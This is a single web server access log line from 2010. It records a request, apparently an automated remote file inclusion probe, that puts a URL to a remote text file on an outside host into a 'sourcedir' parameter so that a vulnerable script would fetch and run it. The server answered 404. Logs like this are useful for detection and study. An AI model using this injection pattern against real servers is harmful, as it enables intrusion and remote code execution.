74.223.143.131 - - [17/Jan/2010:20:35:42 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
